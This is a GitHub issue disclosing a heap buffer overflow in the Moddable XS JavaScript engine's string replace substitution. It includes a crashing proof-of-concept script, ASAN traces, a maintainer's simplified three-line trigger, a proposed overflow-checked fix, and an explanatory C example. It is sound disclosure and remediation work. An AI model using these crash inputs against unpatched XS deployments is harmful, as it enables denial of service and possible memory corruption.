
Heap-buf-overflow (/usr/local/bin/xst+0x4ec9ab) in __asan_memcpy #759

Closed
hope-fly opened this issue Dec 28, 2021 · 2 comments
Labels: confirmed (issue reported has been reproduced); fixed - please verify (issue has been fixed, please verify and close)

Comments

@hope-fly

hope-fly commented Dec 28, 2021

Moddable-XS revision

Commit: 2f93df29

Version: 11.5.0 32 4

Build environment

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps
cd  ~/moddable/xs/makefiles/lin
make -f xst.mk
Test case
function JSEtest(str, count) {
  // Double str until it is at least 1 << 16 characters long. The comma
  // expression evaluates to its last operand, so "$1" has no effect here
  // and the count argument is never used.
  while (str.length < ("$1", 1 << 16)) {
      try {
         str += str;
      } catch (e) {}
  }
  return str.substring();
}
var x = JSEtest("1", 1 << 20);   // subject: 65536 "1" characters
var y = JSEtest("$1", 1 << 16);  // replacement template: 32768 "$1" references

var exception;
try {
  // /(.+)/ captures the whole 65536-char subject, so every "$1" in y expands
  // to 65536 characters: 32768 * 65536 bytes in the substitution string.
  var __v_6623 = x.replace(/(.+)/g, y);
} catch (e) {
  exception = e;
}
Execution & Output with ASAN
$ ./moddable/build/bin/lin/debug/xst poc.js
==113836==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fdb09ffc820 at pc 0x0000004ec9ac bp 0x7ffe814586d0 sp 0x7ffe81457e80
WRITE of size 65536 at 0x7fdb09ffc820 thread T0
    #0 0x4ec9ab in __asan_memcpy (/usr/local/bin/xst+0x4ec9ab)
    #1 0x915e02 in fxPushSubstitutionString /root/moddable/xs/sources/xsString.c:1995:9
    #2 0x839a57 in fx_RegExp_prototype_replace /root/moddable/xs/sources/xsRegExp.c:834:5
    #3 0x84f3ca in fxRunID /root/moddable/xs/sources/xsRun.c:842:7
    #4 0x90d877 in fx_String_prototype_withRegexp /root/moddable/xs/sources/xsString.c:1675:5
    #5 0x8fc277 in fx_String_prototype_replace /root/moddable/xs/sources/xsString.c:1120:6
    #6 0x84f3ca in fxRunID /root/moddable/xs/sources/xsRun.c:842:7
    #7 0x8ceaac in fxRunScript /root/moddable/xs/sources/xsRun.c:4766:4
    #8 0xad3231 in fxRunProgramFile /root/moddable/xs/tools/xst.c:1387:2
    #9 0xacfa83 in main /root/moddable/xs/tools/xst.c:281:8
    #10 0x7fdb0cd0fbf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
    #11 0x42ddc9 in _start (/usr/local/bin/xst+0x42ddc9)

0x7fdb09ffc820 is located 0 bytes to the right of 16777248-byte region [0x7fdb08ffc800,0x7fdb09ffc820)
allocated by thread T0 here:
    #0 0x4edc80 in malloc (/usr/local/bin/xst+0x4edc80)
    #1 0x7dba63 in fxAllocateChunks /root/moddable/xs/sources/xsPlatforms.c:123:9
    #2 0x759641 in fxGrowChunks /root/moddable/xs/sources/xsMemory.c:506:11
    #3 0x75876a in fxAllocate /root/moddable/xs/sources/xsMemory.c:170:2
    #4 0x53d89c in fxCreateMachine /root/moddable/xs/sources/xsAPI.c:1382:4
    #5 0xace769 in main /root/moddable/xs/tools/xst.c:259:19
    #6 0x7fdb0cd0fbf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310

SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/local/bin/xst+0x4ec9ab) in __asan_memcpy
Shadow bytes around the buggy address:
  0x0ffbe13f78b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ffbe13f78c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ffbe13f78d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ffbe13f78e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ffbe13f78f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0ffbe13f7900: 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa
  0x0ffbe13f7910: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ffbe13f7920: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ffbe13f7930: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ffbe13f7940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ffbe13f7950: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==113836==ABORTING

No-ASAN Output

[1]    5720 segmentation fault  xst poc.js

Credits: Found by OWL337 team.

phoddie added the "confirmed" (issue reported has been reproduced) label Dec 28, 2021
@phoddie
Collaborator

phoddie commented Dec 28, 2021

The POC may be simplified to the following:

var x = "1".repeat(65536);
var y = "$1".repeat(32768);
x.replace(/(.+)/g, y);

A quick fix is change this line...

l += mxStringLength(capture->value.string);

...to use fxAddChunkSizes:

l = fxAddChunkSizes(the, l, mxStringLength(capture->value.string));

But it appears there are other paths where l can overflow, so this requires further investigation.
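The following is an added example (written for this page, not Moddable's source) of the integer-overflow pattern behind this report and of the kind of checked accumulation the comment suggests. It assumes a 32-bit txSize stand-in for the engine's length type, a hypothetical add_chunk_sizes written in the spirit of fxAddChunkSizes, and a simplified template language in which only "$1" is special. With the PoC's numbers (32768 references to a 65536-character capture) the unchecked sum reaches exactly 2^31 and wraps, which is what the checked version refuses before any buffer is allocated or copied into.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Stand-in for the engine's 32-bit size type (assumption for this example). */
typedef int32_t txSize;

/* Hypothetical checked add in the spirit of fxAddChunkSizes: reports failure
   instead of wrapping when a + b would exceed INT32_MAX. */
bool add_chunk_sizes(txSize a, txSize b, txSize *out) {
    if (a < 0 || b < 0 || a > INT32_MAX - b)
        return false;
    *out = a + b;
    return true;
}

/* Total length of a template made of `literal_len` literal characters plus
   `ref_count` "$1" references, each expanding to `capture_len` characters.
   Returns false if the total does not fit in txSize. */
bool substitution_length(txSize literal_len, txSize ref_count,
                         txSize capture_len, txSize *out) {
    txSize l = literal_len;
    for (txSize i = 0; i < ref_count; i++) {
        if (!add_chunk_sizes(l, capture_len, &l))
            return false;               /* overflow: stop before allocating */
    }
    *out = l;
    return true;
}

/* The same accumulation done with wrapping arithmetic (on uint32_t so the
   example itself has no undefined behaviour): the value an unchecked
   `l += length` would end up handing to the allocator. */
txSize wrapped_length(txSize literal_len, txSize ref_count, txSize capture_len) {
    uint32_t l = (uint32_t)literal_len;
    for (txSize i = 0; i < ref_count; i++)
        l += (uint32_t)capture_len;
    return (txSize)l;
}

/* Two-pass expansion: size the result with checked adds, then copy.
   Returns NULL if the size overflows or allocation fails; on success the
   caller owns the buffer and *out_len holds its length without the NUL. */
char *expand_template(const char *tmpl, const char *capture, txSize *out_len) {
    txSize cap_len = (txSize)strlen(capture);
    txSize l = 0;
    const char *p;

    /* pass 1: compute the exact size, refusing to wrap */
    for (p = tmpl; *p; p++) {
        txSize piece = 1;
        if (p[0] == '$' && p[1] == '1') {
            piece = cap_len;
            p++;                        /* skip the '1' */
        }
        if (!add_chunk_sizes(l, piece, &l))
            return NULL;
    }
    if (!add_chunk_sizes(l, 1, &l))     /* room for the terminator */
        return NULL;

    char *buf = malloc((size_t)l);
    if (!buf)
        return NULL;

    /* pass 2: copy; every memcpy below is within the size computed above */
    char *q = buf;
    for (p = tmpl; *p; p++) {
        if (p[0] == '$' && p[1] == '1') {
            memcpy(q, capture, (size_t)cap_len);
            q += cap_len;
            p++;
        } else {
            *q++ = *p;
        }
    }
    *q = '\0';
    *out_len = l - 1;
    return buf;
}

int main(void) {
    txSize n;
    /* the PoC's sizes: 32768 "$1" references, each expanding to 65536 chars */
    if (!substitution_length(0, 32768, 65536, &n))
        printf("32768 x 65536 overflows txSize; wrapped value would be %d\n",
               wrapped_length(0, 32768, 65536));
    char *s = expand_template("<$1>", "cap", &n);
    if (s) {
        printf("%s (%d bytes)\n", s, n);
        free(s);
    }
    return 0;
}
```

The point of the two-pass shape is that the size check happens once, up front, and the copy loop never has to reason about overflow; a single unchecked `+=` in the sizing pass is enough to make a later memcpy write past the allocation, which is exactly the shape of the ASAN report above.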

mkellner pushed a commit that referenced this issue Jan 10, 2022
phoddie added the "fixed - please verify" (issue has been fixed, please verify and close) label Jan 10, 2022
@hope-fly
Author

Verified!

@phoddie phoddie closed this as completed Jan 13, 2022